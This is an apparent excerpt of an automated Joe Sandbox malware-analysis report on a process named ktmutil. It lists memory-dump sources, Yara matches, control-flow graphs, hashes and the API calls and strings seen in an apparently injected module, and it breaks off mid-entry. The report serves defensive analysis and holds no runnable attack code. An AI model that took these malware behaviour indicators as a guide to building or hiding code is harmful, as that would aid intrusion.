                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: c58b1d28f7d8c38ccc00cbc4a76da1268782df48a96b6692224138bb0ff47c59
                                                                          • Instruction ID: 406dafb7c250783c2e6267ef5da8c2eceb7ca79303b94b74b46cc4481e3d40e5
                                                                          • Opcode Fuzzy Hash: c58b1d28f7d8c38ccc00cbc4a76da1268782df48a96b6692224138bb0ff47c59
                                                                          • Instruction Fuzzy Hash: 2A90022525555502D150B25C44846564006A7E0301F95C021A0814998D865989556221
                                                                          Function 028D82C7 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 148COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • SetErrorMode.KERNELBASE(00008003,?,?,028D1E70,028E812F,028E57EE,028D1E3D), ref: 028D8273
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_28c0000_ktmutil.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorMode
                                                                          • String ID: 6$O$S$\$s
                                                                          • API String ID: 2340568224-3854637164
                                                                          • Opcode ID: b72d2c1f748663960c741968c7166302356d5f212e34cd27ab021486547b8256
                                                                          • Instruction ID: 93aa025b15d3152fca2d36a1aee927a06b411a943cb2f688cd48fbf0f37ea5be
                                                                          • Opcode Fuzzy Hash: b72d2c1f748663960c741968c7166302356d5f212e34cd27ab021486547b8256
                                                                          • Instruction Fuzzy Hash: BF41E4BAD00118ABDF10EF98DC49BEEB3B9EF40318F0441A9ED0DD6141E7759A598BE1
                                                                          Function 028D0E4D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 173 28d0e4d-28d0e4e 174 28d0e50-28d0e5a 173->174 175 28d0e92-28d0ed0 173->175 177 28d0e5c 174->177 178 28d0e42-28d0e4b 174->178 179 28d0f00-28d0f5e call 28eb6d0 call 28ec0e0 call 28d4650 call 28c1410 call 28e1d50 175->179 180 28d0ed2-28d0ee7 175->180 177->175 178->173 181 28d0e1d-28d0e3a 178->181 193 28d0f80-28d0f85 179->193 194 28d0f60-28d0f71 PostThreadMessageW 179->194 181->178 194->193 195 28d0f73-28d0f7d 194->195 195->193
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_28c0000_ktmutil.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 7438m-J24$7438m-J24
                                                                          • API String ID: 0-3908258731
                                                                          • Opcode ID: fb8d70d64d6cde8a36ce0eb32f01734a64750901c322100b92a227c048b10c64
                                                                          • Instruction ID: d66b3efd78f463edf2752d114d924f4d21dd9bdb226c7dfd2e4a4ade5f4bdee7
                                                                          • Opcode Fuzzy Hash: fb8d70d64d6cde8a36ce0eb32f01734a64750901c322100b92a227c048b10c64
                                                                          • Instruction Fuzzy Hash: 8E31BD39E412896BDB129B74DC01BCEBB74EF42724F18829AE914EF5C1C334540ACBD1
                                                                          Function 028D0EE9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 90threadwindowCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 196 28d0ee9-28d0eea 197 28d0eec-28d0eff 196->197 198 28d0e9f-28d0ed0 196->198 201 28d0f00-28d0f5e call 28eb6d0 call 28ec0e0 call 28d4650 call 28c1410 call 28e1d50 197->201 198->201 202 28d0ed2-28d0ee7 198->202 213 28d0f80-28d0f85 201->213 214 28d0f60-28d0f71 PostThreadMessageW 201->214 214->213 215 28d0f73-28d0f7d 214->215 215->213
                                                                          APIs
                                                                          • PostThreadMessageW.USER32(7438m-J24,00000111,00000000,00000000), ref: 028D0F6D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_28c0000_ktmutil.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID: 7438m-J24$7438m-J24
                                                                          • API String ID: 1836367815-3908258731
                                                                          • Opcode ID: baf26b661c2cec8a3370a92062a33898e168868e86431754ca21920a973eba91
                                                                          • Instruction ID: 28f643fd73ac042e01c8f6f4b6acc7f7e16e4271e65568ea9d5844882ee701ae
                                                                          • Opcode Fuzzy Hash: baf26b661c2cec8a3370a92062a33898e168868e86431754ca21920a973eba91
                                                                          • Instruction Fuzzy Hash: F4216879E412487ADB219AA49C01FDEBB78EF42764F088255FA14EB6C1D27065068BE2
                                                                          Function 028D0EF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • PostThreadMessageW.USER32(7438m-J24,00000111,00000000,00000000), ref: 028D0F6D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_28c0000_ktmutil.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID: 7438m-J24$7438m-J24
                                                                          • API String ID: 1836367815-3908258731
                                                                          • Opcode ID: cb7c5c24bba79fb8926feaa9f34bdfc46b53a7b9119e670e21555ba31417ba40
                                                                          • Instruction ID: 602fb38473824122aeee20ce3c7bd8e2825ea7bfbc2f87d25c2f99a678e2e066
                                                                          • Opcode Fuzzy Hash: cb7c5c24bba79fb8926feaa9f34bdfc46b53a7b9119e670e21555ba31417ba40
                                                                          • Instruction Fuzzy Hash: 83012279E41208B6EB21AB948C01FDF7B7C9F41B54F108055FA04BB2C1D7B4A6068BE6
                                                                          Function 028E3A70 Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 224COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 231 28e3a70-28e3abf 234 28e3ac2-28e3ad3 231->234 235 28e3ad8-28e3aee 234->235 236 28e3b2a-28e3b50 235->236 237 28e3af0-28e3afb 235->237 239 28e3b23 236->239 237->235 238 28e3afd-28e3b21 237->238 238->239 239->234 240 28e3b25 239->240 241 28e3b26-28e3b27 240->241 242 28e3b75-28e3b87 240->242 241->236 243 28e3b59-28e3b73 242->243 244 28e3b89-28e3b92 242->244 243->242 246 28e3b94-28e3b95 244->246 247 28e3be6-28e3be8 246->247 248 28e3b97 246->248 247->246 251 28e3bea-28e3bf0 247->251 249 28e3b99-28e3ba8 248->249 250 28e3c16-28e3c48 call 28eb5a0 248->250 255 28e3bcd-28e3bcf 249->255 256 28e3baa-28e3baf 249->256 257 28e3c4e-28e3cc8 call 28eb680 call 28d4650 call 28c1410 call 28e1d50 250->257 258 28e3d54-28e3d5a 250->258 259 28e3bc8-28e3bca 255->259 260 28e3bd1-28e3be5 255->260 269 28e3cd0-28e3ce4 Sleep 257->269 259->255 260->247 270 28e3ce6-28e3cf8 269->270 271 28e3d45-28e3d4c 269->271 272 28e3d1a-28e3d32 270->272 273 28e3cfa-28e3d18 call 28e60b0 270->273 271->269 274 28e3d4e 271->274 275 28e3d38-28e3d3b 272->275 276 28e3d33 call 28e6150 272->276 273->275 274->258 275->271 276->275
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_28c0000_ktmutil.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: net.dll$wininet.dll
                                                                          • API String ID: 0-1269752229
                                                                          • Opcode ID: 10dc8790ff7b4fcc61a02b35218861c4b0d30ba0ba794bc0b3a5582a787dc690
                                                                          • Instruction ID: e4282bc9b1f8558fcf75a2ac73e22aa4d02eaff9f735cdef0d6cb9948c3a8a73
                                                                          • Opcode Fuzzy Hash: 10dc8790ff7b4fcc61a02b35218861c4b0d30ba0ba794bc0b3a5582a787dc690
                                                                          • Instruction Fuzzy Hash: 2271AD79604746ABDF21DF28C880BFABBB4FF86310F54059ED55A9B281D3309946CBD1
                                                                          Function 028E3C00 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 279 28e3c00-28e3c35 280 28e3c41-28e3c48 279->280 281 28e3c3c call 28eb5a0 279->281 282 28e3c4e-28e3cc8 call 28eb680 call 28d4650 call 28c1410 call 28e1d50 280->282 283 28e3d54-28e3d5a 280->283 281->280 292 28e3cd0-28e3ce4 Sleep 282->292 293 28e3ce6-28e3cf8 292->293 294 28e3d45-28e3d4c 292->294 295 28e3d1a-28e3d32 293->295 296 28e3cfa-28e3d18 call 28e60b0 293->296 294->292 297 28e3d4e 294->297 298 28e3d38-28e3d3b 295->298 299 28e3d33 call 28e6150 295->299 296->298 297->283 298->294 299->298
                                                                          APIs
                                                                          • Sleep.KERNELBASE(000007D0), ref: 028E3CDB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_28c0000_ktmutil.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID: net.dll$wininet.dll
                                                                          • API String ID: 3472027048-1269752229
                                                                          • Opcode ID: 342617ec5039f70802c1a6f300264fcff30f55f544d7508cead31da7ab62e113
                                                                          • Instruction ID: bb07be952baf9d056789fb9ddcedf836db4a33f5d00bdc9440f6f00aea62f031
                                                                          • Opcode Fuzzy Hash: 342617ec5039f70802c1a6f300264fcff30f55f544d7508cead31da7ab62e113
                                                                          • Instruction Fuzzy Hash: 863172B9601605BBDB14DF64CC81FEBBBB9EB89704F14455DF61E9B240D370AA40CBA1
                                                                          Function 028E3BF8 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 99sleepCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 302 28e3bf8-28e3c35 304 28e3c41-28e3c48 302->304 305 28e3c3c call 28eb5a0 302->305 306 28e3c4e-28e3cc8 call 28eb680 call 28d4650 call 28c1410 call 28e1d50 304->306 307 28e3d54-28e3d5a 304->307 305->304 316 28e3cd0-28e3ce4 Sleep 306->316 317 28e3ce6-28e3cf8 316->317 318 28e3d45-28e3d4c 316->318 319 28e3d1a-28e3d32 317->319 320 28e3cfa-28e3d18 call 28e60b0 317->320 318->316 321 28e3d4e 318->321 322 28e3d38-28e3d3b 319->322 323 28e3d33 call 28e6150 319->323 320->322 321->307 322->318 323->322
                                                                          APIs
                                                                          • Sleep.KERNELBASE(000007D0), ref: 028E3CDB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_28c0000_ktmutil.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID: net.dll$wininet.dll
                                                                          • API String ID: 3472027048-1269752229
                                                                          • Opcode ID: 46f91610b8cf44bb5da95720275f5d4d0eb52e6f8a09d3c446b8f738d058006c
                                                                          • Instruction ID: 4d6e7195245b752bc137eae0fab0bc58de59394d790151a05cb157e062d5a28e
                                                                          • Opcode Fuzzy Hash: 46f91610b8cf44bb5da95720275f5d4d0eb52e6f8a09d3c446b8f738d058006c
                                                                          • Instruction Fuzzy Hash: 8931A4B8A01705BBDB14DF64CC81FEBBBB9FB45304F144559EA1EAB240D374AA40CB91
                                                                          Function 028E3BF2 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 82sleepCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 326 28e3bf2-28e3c35 328 28e3c41-28e3c48 326->328 329 28e3c3c call 28eb5a0 326->329 330 28e3c4e-28e3cc8 call 28eb680 call 28d4650 call 28c1410 call 28e1d50 328->330 331 28e3d54-28e3d5a 328->331 329->328 340 28e3cd0-28e3ce4 Sleep 330->340 341 28e3ce6-28e3cf8 340->341 342 28e3d45-28e3d4c 340->342 343 28e3d1a-28e3d32 341->343 344 28e3cfa-28e3d18 call 28e60b0 341->344 342->340 345 28e3d4e 342->345 346 28e3d38-28e3d3b 343->346 347 28e3d33 call 28e6150 343->347 344->346 345->331 346->342 347->346
                                                                          APIs
                                                                          • Sleep.KERNELBASE(000007D0), ref: 028E3CDB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_28c0000_ktmutil.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID: net.dll$wininet.dll
                                                                          • API String ID: 3472027048-1269752229
                                                                          • Opcode ID: 779382c2c7d36872cbb9d6305712a5d743868e9a3c22e136e49d9df40dddf251
                                                                          • Instruction ID: dc8a96d39a6039ed98b91f74e9e917aea5de88efc29df313059464ec06d5923b
                                                                          • Opcode Fuzzy Hash: 779382c2c7d36872cbb9d6305712a5d743868e9a3c22e136e49d9df40dddf251
                                                                          • Instruction Fuzzy Hash: EE319EB8A01605ABDB14DF64C880BFBBBB5FB85304F148559E61EAB240D374AA80CF91
                                                                          Function 028D46D0 Relevance: 1.7, APIs: 1, Instructions: 152COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_28c0000_ktmutil.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a7925a7f1a9edda3ae31af877a790327190ff6439a13d207011e06b013ef9105
                                                                          • Instruction ID: 612ce5b1bfebc6b5731a923476ef3ede8e0985afdc742045525b2aed43775079
                                                                          • Opcode Fuzzy Hash: a7925a7f1a9edda3ae31af877a790327190ff6439a13d207011e06b013ef9105
                                                                          • Instruction Fuzzy Hash: AF41A8BEE4010C6BDF10CAE8DC82FEAB7B8DB42314F144698ED59CB241E631D8558B81
                                                                          Function 028D4650 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 028D46C2
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_28c0000_ktmutil.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Load
                                                                          • String ID:
                                                                          • API String ID: 2234796835-0
                                                                          • Opcode ID: 2ecc584568fcd9ac5dc1418675d0c4bb44afe3f298f8f2a2a2aba008d92e6909
                                                                          • Instruction ID: 4dae5c073d24329722482fb40118940dd18bc92bd8581585a8220d14846001b4
                                                                          • Opcode Fuzzy Hash: 2ecc584568fcd9ac5dc1418675d0c4bb44afe3f298f8f2a2a2aba008d92e6909
                                                                          • Instruction Fuzzy Hash: C9015EBDD0020DABDF10EBE4EC41F9DB7B89B04308F0045A5E919D7241F631E7188B92
                                                                          Function 028D4643 Relevance: 1.5, APIs: 1, Instructions: 46libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 028D46C2
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_28c0000_ktmutil.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Load
                                                                          • String ID:
                                                                          • API String ID: 2234796835-0
                                                                          • Opcode ID: 2a8d48649bf1682a7b95131fede5f816520d383ba6ddb35d9a95bb367f1c7966
                                                                          • Instruction ID: 3dea2a1e7cd85221b11f9b0273ad87da5241f9a014560a16f1d3d06ad3688a7e
                                                                          • Opcode Fuzzy Hash: 2a8d48649bf1682a7b95131fede5f816520d383ba6ddb35d9a95bb367f1c7966
                                                                          • Instruction Fuzzy Hash: 0B01D47DD4120EBBDF10DBA4DC41FD8BBB89B44708F0041D9EC0CCA141E231A7488B92
                                                                          Function 028C9E40 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 028C9E85
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_28c0000_ktmutil.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateThread
                                                                          • String ID:
                                                                          • API String ID: 2422867632-0
                                                                          • Opcode ID: 5eb34b7d135d341b89e67e4cd042e1c91de9a9ca9d643107c86f4f94cf54cfc6
                                                                          • Instruction ID: 6150f4d4d4ea15d19c162fbe94ff63bb92ec00a63ef516696e75f4870a5bcf78
                                                                          • Opcode Fuzzy Hash: 5eb34b7d135d341b89e67e4cd042e1c91de9a9ca9d643107c86f4f94cf54cfc6
                                                                          • Instruction Fuzzy Hash: FDF0E53B38030436E62065ED9C02FDBB78D8B81B61F200025F70CEB1C0DAA2F80046A5
                                                                          Function 028C9E3A Relevance: 1.5, APIs: 1, Instructions: 33threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 028C9E85
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_28c0000_ktmutil.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateThread
                                                                          • String ID:
                                                                          • API String ID: 2422867632-0
                                                                          • Opcode ID: 4130ea286ae78d20c001ba41e5c8f28ddd55b37959682d63fdfdca20f3ad660d
                                                                          • Instruction ID: 89e4019746990f2fa82f5f50967f32b086f00128c48dd8b4cd0181998d7c1dca
                                                                          • Opcode Fuzzy Hash: 4130ea286ae78d20c001ba41e5c8f28ddd55b37959682d63fdfdca20f3ad660d
                                                                          • Instruction Fuzzy Hash: 8EF02B3F38030076E230A6A88C06FC7625D8F91B51F244058F20DEB2C0D6A2B44187A5
                                                                          Function 028E98A0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,4241C045,00000007,00000000,00000004,00000000,028D3F38,000000F4), ref: 028E98DC
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_28c0000_ktmutil.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeHeap
                                                                          • String ID:
                                                                          • API String ID: 3298025750-0
                                                                          • Opcode ID: 1b65c6ac63d06a20780f0cdcde3fda65b0f20cf36ec7bb49ff8255cbba53373b
                                                                          • Instruction ID: 03a772ac148bb43599f97de43b57d78c5ed61e194907352361015c1b633a25fd
                                                                          • Opcode Fuzzy Hash: 1b65c6ac63d06a20780f0cdcde3fda65b0f20cf36ec7bb49ff8255cbba53373b
                                                                          • Instruction Fuzzy Hash: C0E039B92002047BCA14EE58DC85EDB33ADEFC9710F004418F908A7241C670F9108AB9
                                                                          Function 028E9850 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlAllocateHeap.NTDLL(028D1B79,?,028E5974,028D1B79,028E57EE,028E5974,?,028D1B79,028E57EE,00001000,?,?,00000000), ref: 028E988F
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_28c0000_ktmutil.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 1279760036-0
                                                                          • Opcode ID: f764058ac5db65d08bddf75ddaae8083e0ef3ce045775ffc38545c6e4d667ad3
                                                                          • Instruction ID: 75b04ad9faca2917e2231a5114770ced1eed3837b201f7830054b567269dd378
                                                                          • Opcode Fuzzy Hash: f764058ac5db65d08bddf75ddaae8083e0ef3ce045775ffc38545c6e4d667ad3
                                                                          • Instruction Fuzzy Hash: 68E06D792007047BD614EE59DC55F9B33ADDFC9714F008408F908A7241CB70B9108BB5
                                                                          Function 028D8240 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNELBASE(00008003,?,?,028D1E70,028E812F,028E57EE,028D1E3D), ref: 028D8273
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_28c0000_ktmutil.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorMode
                                                                          • String ID:
                                                                          • API String ID: 2340568224-0
                                                                          • Opcode ID: 4d5aa44c268ffbb41c953c86651dc3f38137473802a283b4e6576fe0464bbd1d
                                                                          • Instruction ID: b73aef0ff18f7488a66bcf4bc35cc581aaa0f6bc5ef50ddfae3eaff4901c6a52
                                                                          • Opcode Fuzzy Hash: 4d5aa44c268ffbb41c953c86651dc3f38137473802a283b4e6576fe0464bbd1d
                                                                          • Instruction Fuzzy Hash: 36D05E7A3803083BFA00E6B98C0AF5A368E5B04754F158468BA0CDB2C2EA65F8018666
                                                                          Function 03372C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 4adab6d9ce5cd26c5290c1335142a5dae7492745007c339d3c2897f492f23255
                                                                          • Instruction ID: 699a533d1b23b4b733d89062f9e889e927318caf2a26338d16f6583c372ac7b1
                                                                          • Opcode Fuzzy Hash: 4adab6d9ce5cd26c5290c1335142a5dae7492745007c339d3c2897f492f23255
                                                                          • Instruction Fuzzy Hash: 0AB09B719015C5C5DA11F7644A48717790567D0701F59C461D3034645E473DC1D1E175

                                                                          Non-executed Functions

                                                                          Function 03372890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                          • API String ID: 48624451-2108815105
                                                                          • Opcode ID: ce988888a268b14dd04c2eed85da2b5b366b868ba12eb108fc93aeff074d0c1c
                                                                          • Instruction ID: 01a02ea5670d7c8590c05c56ab31527f458cd3ad3d67d14d3859eaba1d90497a
                                                                          • Opcode Fuzzy Hash: ce988888a268b14dd04c2eed85da2b5b366b868ba12eb108fc93aeff074d0c1c
                                                                          • Instruction Fuzzy Hash: 7051C6B6A04616BFCB20DB9C8CD097FF7BCFB09201B188569E4A5D7641D238DE54CBA0
                                                                          Function 033E2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                          • API String ID: 48624451-2108815105
                                                                          • Opcode ID: 881b5ac1e41a7bd9b2e176d06a5c5cd5773ee0308719791e0d8c364096438dc3
                                                                          • Instruction ID: 1266a089647a08dcd666df0a6c874a2761e112597b562285a1418e2f707352d3
                                                                          • Opcode Fuzzy Hash: 881b5ac1e41a7bd9b2e176d06a5c5cd5773ee0308719791e0d8c364096438dc3
                                                                          • Instruction Fuzzy Hash: 0E51E6B5A04665AECB24EF5CCDD097FFBFDAB44200B048859E4A6D76C1D774EA408B60
                                                                          Function 03367630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 033A4742
                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 033A4787
                                                                          • Execute=1, xrefs: 033A4713
                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 033A46FC
                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 033A4655
                                                                          • ExecuteOptions, xrefs: 033A46A0
                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 033A4725
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmpDownload File
